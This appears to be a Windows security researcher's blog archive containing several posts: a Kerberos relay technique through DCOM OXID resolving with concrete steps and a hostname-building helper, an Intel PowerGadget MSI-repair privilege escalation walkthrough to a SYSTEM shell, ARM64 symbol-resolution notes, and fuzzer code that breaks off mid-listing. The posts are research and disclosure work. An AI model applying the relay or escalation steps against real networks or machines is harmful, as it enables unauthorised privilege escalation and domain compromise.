Working your way Around an ACL
There's been plenty of recent discussion about Windows 11's Recall feature and how much of it is a garbage fire, especially around how secure the database storing all those juicy details of your banking details, sexual peccadillos etc. is from prying malware. Spoiler: it's only protected by being ACL'ed to SYSTEM, so any privilege escalation (or non-security boundary *cough*) is sufficient to leak the information.
However, I've not spent the time to set up Recall on any machine I own, and the files are probably correctly ACL'ed. Therefore, this blog isn't here to talk about that. Instead, I was following a thread about Recall and the security of the database by Albacore on Mastodon, and one toot in particular caught my interest.
"@DrewNaylor File Explorer always runs unelevated, Administrators also have access to C:\Program Files\WindowsApps yet you simply can't open it in File Explorer without breaking ACLs no matter how you try."
I thought this wasn't true based on what I know about the "C:\Program Files\WindowsApps" folder, so I decided to see if I could get it to show in an unelevated Explorer. It turns out to be more complex than it should be for various reasons, so let's dig in.
What is the WindowsApps Folder?
Finding a Suitable Access Token
Finishing the Job
Relaying Kerberos Authentication from DCOM OXID Resolving
Recently, there's been some good research into further exploiting the DCOM authentication issues that I initially reported to Microsoft almost 10 years ago. By inducing authentication through DCOM, it can be relayed to a network service, such as Active Directory Certificate Services (ADCS), to elevate privileges and in some cases gain domain administrator access.
The important difference with this new research is taking the abuse of DCOM authentication from local access (in the case of the many Potatoes) to fully remote, by abusing security configuration changes or over-granted group access. For more information I'd recommend reading the slides from Tianze Ding's Black Hat Asia 2024 presentation, or reading about SilverPotato by Andrea Pierini.
This short blog post is directly based on slide 36 of Tianze Ding's presentation, which mentions trying to relay Kerberos authentication from the initial OXID resolver request. I've reproduced the slide below:
The slide says that you can't relay Kerberos authentication during OXID resolving because you can't control the SPN used for the authentication: it's always set to RPCSS/MachineNameFromStringBinding. While you can control the string bindings in the standard OBJREF structure, RPCSS ignores the security bindings, so you can't specify the SPN, unlike with an object RPC call which happens later.

This description intrigued me, as I didn't think it was true. You just had to abuse a "feature" I described in my original Kerberos relay blog post. Specifically, the Kerberos SSPI supports a special format for the SPN which includes marshaled target information. This was something I discovered when trying to see if I could get Kerberos relay from the SMB protocol: the SMB client would call the SecMakeSPNEx2 API, which in turn would call CredMarshalTargetInfo to build a marshaled string which is appended to the end of the SPN. If the Kerberos SSPI sees an SPN in this format, it calculates the length of the marshaled data, strips it from the SPN and continues with the new SPN string.
In practice this means you can build an SPN of the form CLASS/<SERVER><TARGETINFO> and Kerberos will authenticate using CLASS/<SERVER>. The interesting thing about this behavior is that if the <SERVER><TARGETINFO> component comes from the hostname of the server we're authenticating to, then you end up decoupling the SPN used for the authentication from the hostname used to communicate. And that's exactly what we have here: the MachineNameFromStringBinding comes from an untrusted source, the OBJREF we specified. We can specify a machine name in this special format, which will allow the OXID resolver to talk to our server on hostname <SERVER><TARGETINFO> but authenticate using RPCSS/<SERVER>, which can be anything we like.
There are some big caveats with this. Firstly, the machine name must not contain any dots, so it must be an intranet address. This is because it's close to impossible to build a valid TARGETINFO string which represents a valid fully qualified domain name. In many situations this would rule out using this trick; however, as we're dealing with domain authentication scenarios, and the default for the Windows DNS server is to allow any user to create arbitrary hosts within the domain's DNS zone, this isn't an issue.
This restriction also limits the maximum size of the hostname to 63 characters due to the DNS protocol. If you pass a completely empty CREDENTIAL_TARGET_INFORMATION structure to the CredMarshalTargetInfo API you get the minimum valid target information string, which is 44 characters long. This only leaves 19 characters for the SERVER component, but again this shouldn't be a big issue. Windows computer names are typically limited to 15 characters due to the old NetBIOS protocol, and by default SPNs are registered with these short name forms. Finally, in our case, while there won't be an explicit RPCSS SPN registered, this is one of the service classes which is automatically mapped to the HOST class, which will be registered.
To exploit this you'll need to do the following steps:
- Build the machine name by appending the minimum target information string 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA to the hostname from the target SPN. For example, for the SPN RPCSS/ADCS build the string ADCS1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA.
- Register the machine name as a host on the domain's DNS server. Point the record to a server you control on which you can replace the listening service on TCP port 135.
- Build an OBJREF with the machine name and induce OXID resolving through your preferred method, such as abusing IStorage activation.
- Do something useful with the induced Kerberos authentication.
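To make the first step concrete, here's a minimal sketch in Python. The `build_machine_name` helper is hypothetical (not from any tooling mentioned in the post); the 44-character suffix is the minimum marshaled target information string quoted above:

```python
# Minimum marshaled target info string (CredMarshalTargetInfo output for an
# empty CREDENTIAL_TARGET_INFORMATION, as quoted in the post).
MIN_TARGET_INFO = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA"
MAX_DNS_LABEL = 63  # maximum length of a single DNS label

def build_machine_name(spn_host: str) -> str:
    """Append the minimal marshaled target info to the SPN hostname.

    The OXID resolver will connect to the returned name, but Kerberos
    will strip the marshaled suffix and authenticate as RPCSS/<spn_host>.
    """
    if "." in spn_host:
        # The trick only works for dotless intranet names.
        raise ValueError("hostname must be a single intranet label (no dots)")
    name = spn_host + MIN_TARGET_INFO
    if len(name) > MAX_DNS_LABEL:
        raise ValueError(f"label too long: {len(name)} > {MAX_DNS_LABEL}")
    return name

# For the SPN RPCSS/ADCS, register this name in the domain's DNS zone:
print(build_machine_name("ADCS"))
```

The registered record would then point at an attacker-controlled host listening on TCP port 135, per the steps above.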
With this information I did some tests myself, and Andrea also checked with SilverPotato, and it seems to work. There are limits, of course; the big one is that because the security bindings are ignored, the OXID resolver uses Negotiate. This means the Kerberos authentication will always be negotiated with at least integrity enabled, which makes the authentication useless for most scenarios, although it can be used against the default configuration of ADCS (I think).
Issues Resolving Symbols on Windows 11 on ARM64
This is a short blog post about an issue I encountered during some development work on my OleViewDotNet tool and how I resolved it. It might help others if they come across a similar problem, although I'm not sure if I took the best approach.
OleViewDotNet has the ability to parse the internal COM structures in a process and show important information such as the list of current IPIDs exported by the process and the access security descriptor.
PS C:\> $p.Ipids
IPID                                 Interface Name PID   Process Name
----                                 -------------- ---   ------------
00008800-4bd8-0000-c3f9-170a9f197e11 IRundown       19416 powershell.exe
00009401-4bd8-ffff-45b0-a43d5764a731 IRundown       19416 powershell.exe
0000a002-4bd8-5264-7f87-e6cbe82784aa IRundown       19416 powershell.exe
To achieve this task we need access to the symbols of the COMBASE DLL so that we can resolve various root pointers to hash tables and other runtime artifacts. The majority of the code to parse the process information is in the COMProcessParser class, which uses the DBGHELP library to resolve symbols to an address. My code also supports a mechanism to cache the resolved pointers into a text file which can be subsequently used on other systems with the same COMBASE DLL rather than needing to pull down a 30+ MiB symbol file.
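Such a cache can be as simple as a name-to-offset map serialized to text. A hypothetical sketch of the idea in Python (the `symbol=hex-offset` line format is an illustrative choice, not OleViewDotNet's actual on-disk format):

```python
# Sketch: cache resolved symbol offsets to a text file so other systems
# with the same COMBASE build can skip downloading the symbol file.
def save_cache(path, symbols):
    """Write a {name: offset} map as 'name=0x...' lines."""
    with open(path, "w") as f:
        for name, rva in sorted(symbols.items()):
            f.write(f"{name}={rva:#x}\n")

def load_cache(path):
    """Read the 'name=0x...' lines back into a {name: offset} map."""
    symbols = {}
    with open(path) as f:
        for line in f:
            name, _, rva = line.strip().partition("=")
            symbols[name] = int(rva, 16)
    return symbols
```

The cache is only valid for the exact COMBASE build whose symbols produced it, so in practice it would be keyed to the DLL's version or timestamp.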
This works fine on Windows 11 x64, but I noticed that I would get incorrect results on ARM64. In the past I've encountered similar issues that came down to changes in the internal structures used during parsing. Microsoft provides private symbols for COMBASE, so it's pretty easy to check whether the structures differ between the x64 and ARM64 versions of Windows 11. There were no differences that I could see. In any case, I noticed this also impacted trivial values; for example, the symbol gSecDesc contains a pointer to the COM access security descriptor. However, when reading that pointer it was always NULL, even though it should have been initialized.
To add to my confusion, when I checked the symbol in WinDBG it showed the pointer was correctly initialized. However, when I did a search for the expected symbol using the x command in WinDBG I found something interesting:
00007ffa`d0aecb08 combase!gSecDesc = 0x00000000`00000000
00007ffa`d0aed1c8 combase!gSecDesc = 0x00000180`59fdb750
We can see from the output that there are two symbols for gSecDesc, not one. The first has a NULL value while the second has the initialized value. When I checked what address my symbol resolver was returning, it was the first one, whereas WinDBG knew better and would return the second. What on earth is going on?
This is an artifact of a new feature in Windows 11 on ARM64 to simplify the emulation of x64 executables: ARM64X. This is a clever (or terrible) trick to avoid needing separate ARM64 and x64 binaries on the system. Instead, both ARM64 code and x64-compatible code, referred to as ARM64EC (Emulation Compatible), are merged into a single system binary. Presumably in some cases this means that global data structures need to be duplicated, once for the ARM64 code and once for the ARM64EC code. In this case it doesn't seem like there should be two separate global data values, as a pointer is a pointer, but I suppose there might be edge cases where that isn't true and it's simpler to just duplicate the values to avoid conflicts. The details are pretty interesting and there are a few places where this has been reverse engineered; I'd at least recommend this blog post.
My code uses the SymFromName API to query the symbol address, and this just returns the first symbol it finds, which in this case was the ARM64EC one that wasn't initialized in an ARM64 process. I don't know if this is a bug in DBGHELP; perhaps it should try to return the symbol which matches the binary's machine type, or perhaps I'm holding it wrong. Regardless, I needed a way of getting the correct symbol, but after going through the DBGHELP library there was no obvious way of disambiguating the two. However, clearly WinDBG can do it, so there must be a way.
After a bit of hunting around I found that the Debug Interface Access (DIA) library has an IDiaSymbol::get_machineType method which returns the machine type for the symbol, either ARM64 (0xAA64) or ARM64EC (0xA641). Unfortunately, I'd intentionally used DBGHELP as it's installed by default on Windows, whereas DIA needs to be installed separately. There didn't seem to be an equivalent in the DBGHELP library.
Fortunately, after poking around the DBGHELP library looking for a solution, an opportunity presented itself. Internally, DBGHELP (at least in recent versions) uses a private copy of the DIA library. That in itself wouldn't be that helpful, except the library exports a couple of private APIs that allow a caller to query the current DIA state. For example, there's the SymGetDiaSession API, which returns an instance of the IDiaSession interface. From that interface you can query for an instance of the IDiaSymbol interface and then query the machine type. I'm not sure how compatible the version of DIA inside DBGHELP is relative to the publicly released version, but it's compatible enough for my purposes.
Update 2024/04/26: it was pointed out to me that the machine type is present in the SYMBOL_INFO::Reserved[1] field, so you don't need this whole approach with the DIA interface. The point still stands that you need to enumerate the symbols on ARM64 platforms, as there could be multiple ones, and you still need to check the machine type.
To resolve this issue the code in OleViewDotNet takes the following steps on ARM64 systems:
- Instead of calling SymFromName, the code enumerates all symbols matching the name.
- SymGetDiaSession is called to get an instance of the IDiaSession interface.
- The IDiaSession::findSymbolByVA method is called to get an instance of the IDiaSymbol interface for the symbol.
- The IDiaSymbol::get_machineType method is called to get the machine type for the symbol.
- The symbols are filtered based on the context, e.g. if parsing an ARM64 process it uses the ARM64 symbol.
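The final filtering step boils down to picking, among same-named symbols, the one whose machine type matches the target process. A minimal Python model of that selection logic (`pick_symbol` is a hypothetical helper, not OleViewDotNet code; the machine-type constants are the PE values mentioned above):

```python
# PE machine-type constants, as given in the post.
IMAGE_FILE_MACHINE_ARM64 = 0xAA64
IMAGE_FILE_MACHINE_ARM64EC = 0xA641

def pick_symbol(candidates, target_machine):
    """Given (address, machine_type) pairs for one symbol name, return the
    address whose machine type matches the process being parsed."""
    for address, machine in candidates:
        if machine == target_machine:
            return address
    return None

# Modeling the two combase!gSecDesc entries from the WinDBG output; per the
# post, the first (uninitialized) copy SymFromName returned was the ARM64EC
# one, so the machine-type assignment below is an assumption for illustration.
gsecdesc = [
    (0x7FFAD0AECB08, IMAGE_FILE_MACHINE_ARM64EC),
    (0x7FFAD0AED1C8, IMAGE_FILE_MACHINE_ARM64),
]
print(hex(pick_symbol(gsecdesc, IMAGE_FILE_MACHINE_ARM64)))  # 0x7ffad0aed1c8
```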
Intel PowerGadget 3.6 Local Privilege Escalation
Vulnerability summary: Local Privilege Escalation from regular user to SYSTEM, via conhost.exe hijacking triggered by MSI installer in repair mode
Affected Products: Intel PowerGadget
Affected Versions: tested on PowerGadget_3.6.msi (a3834b2559c18e6797ba945d685bf174), file signed on Monday, February 1, 2021 9:43:20 PM (this seems to be the latest version); earlier versions might be affected as well.
Affected Platforms: Windows
Common Vulnerability Scoring System (CVSS) Base Score (CVSSv3): 7.8 HIGH
Risk score (CVSSv3): 7.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H (https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H&version=3.1)
I have reported this issue to Intel, but since the product has been marked End of Life since October 2023, it is not going to receive a security update or a security advisory. Intel said they are OK with me making this finding public, under the condition that I emphasize that the product is EOL.
Description and steps to replicate:
On systems where Intel PowerGadget is installed from an MSI package, a local interactive regular user is able to run the MSI installer file in "repair" mode and hijack the conhost.exe process (which is created by an instance of sc.exe the installer calls during the process) by quickly left-clicking on the console window that pops up for a split second in the late stage of the process. Left-clicking on the conhost.exe console window area freezes the console (preventing the sc.exe process from exiting). That process is running as NT AUTHORITY\SYSTEM. From there, it is possible to run a web browser by clicking on one of the links in the small GUI window that can be opened by right-clicking on the console window bar and choosing "Properties". Once a web browser is spawned, the attacker can call up the "Open" dialog and in that way get a fully working escape to Explorer. From there they can, for example, browse to C:\Windows\System32, right-click on cmd.exe and run it, obtaining a SYSTEM shell.
Now, an important detail: on the most recent builds of Windows, neither Edge nor Internet Explorer will spawn as SYSTEM (this is a mitigation from Microsoft); thus, for successful exploitation, another browser has to already be present on the system. As you can see, I picked Chrome and then spawned an instance of cmd.exe, which turned out to be running as SYSTEM. Also, when doing this, DO NOT check "always use this app" in that dialog: if you pick the wrong one (e.g. Edge or IE), it will be saved as the default http/https handler for SYSTEM, and from then on attacks like this won't work if you want to repeat the PoC, unless you reverse that change somewhere in the registry.
This class of Local Privilege Escalations is described by Mandiant in this article: https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers.
To run the installer in repair mode, one needs to identify the proper MSI file. After a normal installation, it is by default present in the C:\Windows\Installer directory, under a random name. The proper file can be identified by attributes like its checksum, size or "author" information, just as presented in the screenshot below:
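As a sketch, that identification can also be scripted by hashing the cached packages. The `find_msi_by_md5` helper below is hypothetical and purely illustrative, using the MD5 from the summary above:

```python
import hashlib
from pathlib import Path

def find_msi_by_md5(directory, target_md5):
    """Scan a directory of cached MSI packages and return the first one
    whose MD5 digest matches the expected value, or None."""
    for msi in Path(directory).glob("*.msi"):
        digest = hashlib.md5(msi.read_bytes()).hexdigest()
        if digest == target_md5:
            return msi
    return None

if __name__ == "__main__":
    # The PowerGadget_3.6.msi hash from the advisory summary; the MSI cache
    # directory is the default location mentioned above.
    match = find_msi_by_md5(r"C:\Windows\Installer",
                            "a3834b2559c18e6797ba945d685bf174")
    print(match)
```

Hashing every cached package is slow on systems with many installers; filtering by file size first, as the screenshot approach suggests, would narrow the candidates.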
The exploitation process is illustrated in the screenshots below, reflecting the steps taken to attain a SYSTEM shell (no exploit development is required; the issue can be exploited using the GUI).
Just for the record, the versions of Chrome and Windows this was successfully performed on:
Recommendation:
Technically, as per the reference, it is recommended to change the way sc.exe is called, using the WixQuietExec() method (see the second reference). In that case the conhost.exe window will not be visible to the user, making it impossible to perform any GUI interaction and escape.
I am, however, aware that this product has not been maintained since October 2023 (https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html), and that includes security updates. Still, I believe a security advisory and CVE should be released just to make users and administrators aware of why they need to replace PowerGadget with Intel Performance Counter Monitor.
Another possible (short-term) mitigation is to disable MSI (https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi).
References:
https://www.mandiant.com/resources/blog/privileges-third-party-windows-installers
https://wixtoolset.org/docs/v3/customactions/qtexec/
https://www.intel.com/content/www/us/en/developer/articles/tool/power-gadget.html
https://learn.microsoft.com/en-us/windows/win32/msi/disablemsi
Fuzzer Development 3: Building Bochs, MMU, and File I/O
Background
This is the next installment in a series of blog posts detailing the development process of a snapshot fuzzer that aims to utilize Bochs as a target execution engine. You can find the fuzzer and code in the Lucid repository.
Introduction
We're continuing today on our journey to develop our fuzzer. Last time we left off, we had developed the beginnings of a context-switching infrastructure so that we could sandbox Bochs (really a test program) from touching the OS kernel during syscalls.
In this post, we're going to go over some changes and advancements we've made to the fuzzer and also document some progress related to Bochs itself.
Syscall Infrastructure Update
After putting out the last blog post, I got some really good feedback and suggestions from Fuzzing discord legend WorksButNotTested, who informed me that we could cut down on a lot of complexity if we scrapped the full context-switching/C-ABI-to-syscall-ABI register-translation routines altogether and simply had Bochs call a Rust function from C for syscalls. This is very intuitive and obvious in hindsight, and I'm admittedly a little embarrassed to have overlooked this possibility.
Previously, in our custom Musl code, we would have a C function call like so:
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
This is the function that is called when the program needs to make a syscall with 6 arguments. In the previous blog, we changed this function to be an if/else such that, if the program was running under Lucid, we would instead call into Lucid's context-switch function after shuffling the C ABI registers to syscall registers, like so:
static __inline long __syscall6_original(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2), "d"(a3), "r"(r10),
"r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (!g_lucid_ctx) { return __syscall6_original(n, a1, a2, a3, a4, a5, a6); }
register long ret;
register long r12 __asm__("r12") = (size_t)(g_lucid_ctx->exit_handler);
register long r13 __asm__("r13") = (size_t)(&g_lucid_ctx->register_bank);
register long r14 __asm__("r14") = SYSCALL;
register long r15 __asm__("r15") = (size_t)(g_lucid_ctx);
__asm__ __volatile__ (
"mov %1, %%rax\n\t"
"mov %2, %%rdi\n\t"
"mov %3, %%rsi\n\t"
"mov %4, %%rdx\n\t"
"mov %5, %%r10\n\t"
"mov %6, %%r8\n\t"
"mov %7, %%r9\n\t"
"call *%%r12\n\t"
"mov %%rax, %0\n\t"
: "=r" (ret)
: "r" (n), "r" (a1), "r" (a2), "r" (a3), "r" (a4), "r" (a5), "r" (a6),
"r" (r12), "r" (r13), "r" (r14), "r" (r15)
: "rax", "rcx", "r11", "memory"
);
return ret;
}
So this was quite involved. I was very fixated on the idea that "Lucid has to be the kernel. And when userland programs execute a syscall, their state is saved and execution is started in the kernel". This led me astray, since such a complicated routine is not needed for our purposes: we are not actually a kernel, we just want to sandbox away syscalls for one specific program that behaves pretty well. WorksButNotTested instead suggested just calling a Rust function like so:
static __inline long __syscall6(long n, long a1, long a2, long a3, long a4, long a5, long a6)
{
if (g_lucid_syscall)
return g_lucid_syscall(g_lucid_ctx, n, a1, a2, a3, a4, a5, a6);
unsigned long ret;
register long r10 __asm__("r10") = a4;
register long r8 __asm__("r8") = a5;
register long r9 __asm__("r9") = a6;
__asm__ __volatile__ ("syscall" : "=a"(ret) : "a"(n), "D"(a1), "S"(a2),
"d"(a3), "r"(r10), "r"(r8), "r"(r9) : "rcx", "r11", "memory");
return ret;
}
Obviously this is a much simpler solution, and we get to avoid scrambling registers, saving state, inline assembly, and the rest of it. To set this function up, we simply created a new function-pointer global variable in lucid.h in Musl and gave it a definition in src/lucid.c, which you can see in the Musl patches in the repo. g_lucid_syscall looks like this on the Rust side:
pub extern "C" fn lucid_syscall(contextp: *mut LucidContext, n: usize,
a1: usize, a2: usize, a3: usize, a4: usize, a5: usize, a6: usize)
-> u64
We get to use the C ABI to our advantage and maintain the semantics of how a program would normally use Musl. It's a very much appreciated suggestion, and I couldn't be happier with how it turned out.
Calling Convention Changes
During this refactoring for syscalls, I also simplified the way our context-switching calling convention works. Instead of using 4 separate registers for the calling convention, I decided it was doable by just passing a pointer to the Lucid execution context and having the context_switch function itself work out how it should behave based on the context's values. In essence, we're moving complexity from the caller side to the callee side. This means the complexity doesn't keep recurring throughout the codebase; it is encapsulated once, in the context_switch logic itself. This does require some hacky/brittle code, however; for instance, we have to hardcode some struct offsets for the Lucid execution data structure, but that is a small price to pay, in my opinion, for drastically reduced complexity. The context_switch code has been changed to the following:
extern "C" { fn context_switch(); }
global_asm!(
".global context_switch",
"context_switch:",
// Save the CPU flags before we do any operations
"pushfq",
// Save registers we use for scratch
"push r14",
"push r13",
// Determine what execution mode we're in
"mov r14, r15",
"add r14, 0x8", // mode is at offset 0x8 from base
"mov r14, [r14]",
"cmp r14d, 0x0",
"je save_bochs",
// We're in Lucid mode so save Lucid GPRs
"save_lucid: ",
"mov r14, r15",
"add r14, 0x10", // lucid_regs is at offset 0x10 from base
"jmp save_gprs",
// We're in Bochs mode so save Bochs GPRs
"save_bochs: ",
"mov r14, r15",
"add r14, 0x90", // bochs_regs is at offset 0x90 from base
"jmp save_gprs",
You can see that once we hit the context_switch function we save the CPU flags before we do anything that would affect them, then we save a couple of registers to use as scratch. Then we're free to check the value of context->mode to determine what execution mode we're in. Based on that value, we know which register bank to use to save our general-purpose registers. So yes, we do have to hardcode some offsets, but I believe this is overall a much better API and system for context-switching callees, and the data structure itself should be relatively stable at this point and not require massive refactoring.
Introducing Faults
Since the last blog post, I've introduced the concept of a Fault, an error class reserved for instances where some sort of error is encountered during either context-switching code or syscall handling. This error is distinct from our highest-level error, LucidErr. Ultimately, these faults are plumbed back up to Lucid when they are encountered so that Lucid can handle them. As of this moment, Lucid treats any Fault as fatal.
We are able to plumb these back up to Lucid because, before starting Bochs execution, we now save Lucid's state and context-switch into starting Bochs:
#[inline(never)]
pub fn start_bochs(context: &mut LucidContext) {
// Set the execution mode and the reason why we're exiting the Lucid VM
context.mode = ExecMode::Lucid;
context.exit_reason = VmExit::StartBochs;
// Set up the calling convention and then start Bochs by context switching
unsafe {
asm!(
"push r15", // Callee-saved register we have to preserve
"mov r15, {0}", // Move context into R15
"call qword ptr [r15]", // Call context_switch
"pop r15", // Restore callee-saved register
in(reg) context as *mut LucidContext,
);
}
}
We make some changes to the execution context, namely marking the execution mode (Lucid mode) and setting the reason why we're context-switching (to start Bochs). Then, in the inline assembly, we call the function pointer at offset 0 in the execution context structure:
// Execution context that is passed between Lucid and Bochs that tracks
// all of the mutable state information we need to do context-switching
#[repr(C)]
#[derive(Clone)]
pub struct LucidContext {
pub context_switch: usize, // Address of context_switch()
So then our Lucid state is saved in the context_switch routine and we are passed to this logic:
// Handle Lucid context switches here
if LucidContext::is_lucid_mode(context) {
match exit_reason {
// Dispatch to Bochs entry point
VmExit::StartBochs => {
jump_to_bochs(context);
},
_ => {
fault!(context, Fault::BadLucidExit);
}
}
}
Finally, we call jump_to_bochs:
// Standalone function to literally jump to Bochs entry and provide the stack
// address to Bochs
fn jump_to_bochs(context: *mut LucidContext) {
// RDX: we have to clear this register as the ABI specifies that exit
// hooks are set when rdx is non-null at program start
//
// RAX: arbitrarily used as a jump target to the program entry
//
// RSP: Rust does not allow you to use 'rsp' explicitly with in(), so we
// have to manually set it with a `mov`
//
// R15: holds a pointer to the execution context, if this value is non-
// null, then Bochs learns at start time that it is running under Lucid
//
// We don't really care about execution order as long as we specify clobbers
// with out/lateout, that way the compiler doesn't allocate a register we
// then immediately clobber
unsafe {
asm!(
"xor rdx, rdx",
"mov rsp, {0}",
"mov r15, {1}",
"jmp rax",
in(reg) (*context).bochs_rsp,
in(reg) context,
in("rax") (*context).bochs_entry,
lateout("rax") _, // Clobber (inout so no conflict with in)
out("rdx") _, // Clobber
out("r15") _, // Clobber
);
}
}
Full-blown context-switching like this allows us to encounter a Fault and then pass that error back to Lucid for handling. In the fault_handler, we set the Fault type in the execution context, and then we attempt to restore execution back to Lucid:
// Where we handle faults that may occur when context-switching from Bochs. We
// just want to make the fault visible to Lucid so we set it in the context,
// then we try to restore Lucid execution from its last-known good state
pub fn fault_handler(contextp: *mut LucidContext, fault: Fault) {
let context = unsafe { &mut *contextp };
match fault {
Fault::Success => context.fault = Fault::Success,
...
}
// Attempt to restore Lucid execution
restore_lucid_execution(contextp);
}
// We use this function to restore Lucid execution to its last known good state
// This is just really trying to plumb up a fault to a level that is capable of
// discerning what action to take. Right now, we probably just call it fatal.
// We don't really deal with double-faults, it doesn't make much sense at the
// moment when a single-fault will likely be fatal already. Maybe later?
fn restore_lucid_execution(contextp: *mut LucidContext) {
let context = unsafe { &mut *contextp };
// Fault should be set, but change the execution mode now since we're
// jumping back to Lucid
context.mode = ExecMode::Lucid;
// Restore extended state
let save_area = context.lucid_save_area;
let save_inst = context.save_inst;
match save_inst {
SaveInst::XSave64 => {
// Retrieve XCR0 value, this will serve as our save mask
let xcr0 = unsafe { _xgetbv(0) };
// Call xrstor to restore the extended state from Bochs save area
unsafe { _xrstor64(save_area as *const u8, xcr0); }
},
SaveInst::FxSave64 => {
// Call fxrstor to restore the extended state from Bochs save area
unsafe { _fxrstor64(save_area as *const u8); }
},
_ => (), // NoSave
}
// Next, we need to restore our GPRs. This is a slightly different order than
// returning from a successful context switch since normally we'd still be
// using our own stack; however right now, we still have Bochs' stack, so
// we need to recover our own Lucid stack which is saved as RSP in our
// register bank
let lucid_regsp = &context.lucid_regs as *const _;
// Move that pointer into R14 and restore our GPRs. After that we have the
// RSP value that we saved when we called into context_switch, this RSP was
// then subtracted from by 0x8 for the pushfq operation that comes right
// after. So in order to recover our CPU flags, we need to manually sub
// 0x8 from the stack pointer. Pop the CPU flags back into place, and then
// return to the last known good Lucid state
unsafe {
asm!(
"mov r14, {0}",
"mov rax, [r14 + 0x0]",
"mov rbx, [r14 + 0x8]",
"mov rcx, [r14 + 0x10]",
"mov rdx, [r14 + 0x18]",
"mov rsi, [r14 + 0x20]",
"mov rdi, [r14 + 0x28]",
"mov rbp, [r14 + 0x30]",
"mov rsp, [r14 + 0x38]",
"mov r8, [r14 + 0x40]",
"mov r9, [r14 + 0x48]",
"mov r10, [r14 + 0x50]",
"mov r11, [r14 + 0x58]",
"mov r12, [r14 + 0x60]",
"mov r13, [r14 + 0x68]",
"mov r15, [r14 + 0x78]",
"mov r14, [r14 + 0x70]",
"sub rsp, 0x8",
"popfq",
"ret",
in(reg) lucid_regsp,
);
}
}
As you can see, restoring Lucid state and resuming execution is quite involved. One tricky thing we had to deal with was the fact that, right now, when a Fault occurs we are likely operating in Bochs mode, which means our stack is Bochs' stack and not Lucid's. So even though this is technically just a context switch, we had to change the order around a little bit to pop Lucid's saved state into our current state and resume execution. Now when Lucid calls functions that context-switch, it can simply check the "return" value of such functions by checking whether a Fault was noted in the execution context, like so:
// Start executing Bochs
prompt!("Starting Bochs...");
start_bochs(&mut lucid_context);
// Check to see if any faults occurred during Bochs execution
if !matches!(lucid_context.fault, Fault::Success) {
fatal!(LucidErr::from_fault(lucid_context.fault));
}
Pretty neat imo!
Sandboxing Thread-Local-Storage
Coming into this project, I honestly didn't know much about thread-local storage (TLS) except that it was some magic per-thread area of memory that did stuff. That is still the entirety of my knowledge, really, except now I've seen some code that allocates and initializes that memory, which helps me appreciate what is really going on.
Once I implemented the Fault
system discussed above, I noticed that Lucid would segfault when exiting. After some debugging, I realized it was calling a function pointer that was a bogus address. How could this have happened? Well, after some digging, I noticed that right before that function call, an offset of the fs
register was used to load the address from memory. Typically, fs
is used to access TLS. So at that point, I had a strong suspicion that Bochs had somehow corrupted the value of my fs
register. So I did a quick grep through Musl looking for fs
register access and found the following:
/* Copyright 2011-2012 Nicholas J. Kain, licensed under standard MIT license */
.text
.global __set_thread_area
.hidden __set_thread_area
.type __set_thread_area,@function
__set_thread_area:
mov %rdi,%rsi /* shift for syscall */
movl $0x1002,%edi /* SET_FS register */
movl $158,%eax /* set fs segment to */
syscall /* arch_prctl(SET_FS, arg)*/
ret
So this function, __set_thread_area
uses an inline syscall
instruction to call arch_prctl
to directly manipulate the fs
register. This made a lot of sense because, if the syscall
instruction was indeed called, we wouldn't intercept this with our syscall sandboxing infrastructure because we never instrumented it; we've only instrumented what boils down to the syscall()
function wrapper in Musl. So this would escape our sandbox and directly manipulate fs
. Sure enough, I discovered that this function is called during TLS initialization in src/env/__init_tls.c
:
int __init_tp(void *p)
{
pthread_t td = p;
td->self = td;
int r = __set_thread_area(TP_ADJ(p));
if (r < 0) return -1;
if (!r) libc.can_do_threads = 1;
td->detach_state = DT_JOINABLE;
td->tid = __syscall(SYS_set_tid_address, &__thread_list_lock);
td->locale = &libc.global_locale;
td->robust_list.head = &td->robust_list.head;
td->sysinfo = __sysinfo;
td->next = td->prev = td;
return 0;
}
So in this __init_tp
function, we're given a pointer and then we call the TP_ADJ
macro to do some arithmetic on the pointer and pass that value to __set_thread_area
so that fs
is manipulated. Great, now how do we sandbox this? I wanted to avoid messing with the inline assembly in __set_thread_area
itself, so I just changed the source so that Musl would instead utilize the syscall()
wrapper function which calls our instrumented syscall functions under the hood, like so:
#ifndef ARCH_SET_FS
#define ARCH_SET_FS 0x1002
#endif /* ARCH_SET_FS */
int __init_tp(void *p)
{
pthread_t td = p;
td->self = td;
int r = syscall(SYS_arch_prctl, ARCH_SET_FS, TP_ADJ(p));
//int r = __set_thread_area(TP_ADJ(p));
Now, we can intercept this syscall in Lucid and effectively do nothing. As long as there are no other direct accesses to fs
(and there still might be!), we should be fine here. I also adjusted the Musl code so that if we're running under Lucid, we provide a TLS area via the execution context by just creating a mock area of what Musl calls the builtin_tls
:
static struct builtin_tls {
char c;
struct pthread pt;
void *space[16];
} builtin_tls[1];
So now, when __init_tp
is called, the pointer it is given points to our own TLS block of memory we've created in the execution context, so that we now have access to things like errno
in Lucid:
if (libc.tls_size > sizeof builtin_tls) {
#ifndef SYS_mmap2
#define SYS_mmap2 SYS_mmap
#endif
__asm__ __volatile__ ("int3"); // Added by me just in case
mem = (void *)__syscall(
SYS_mmap2,
0, libc.tls_size, PROT_READ|PROT_WRITE,
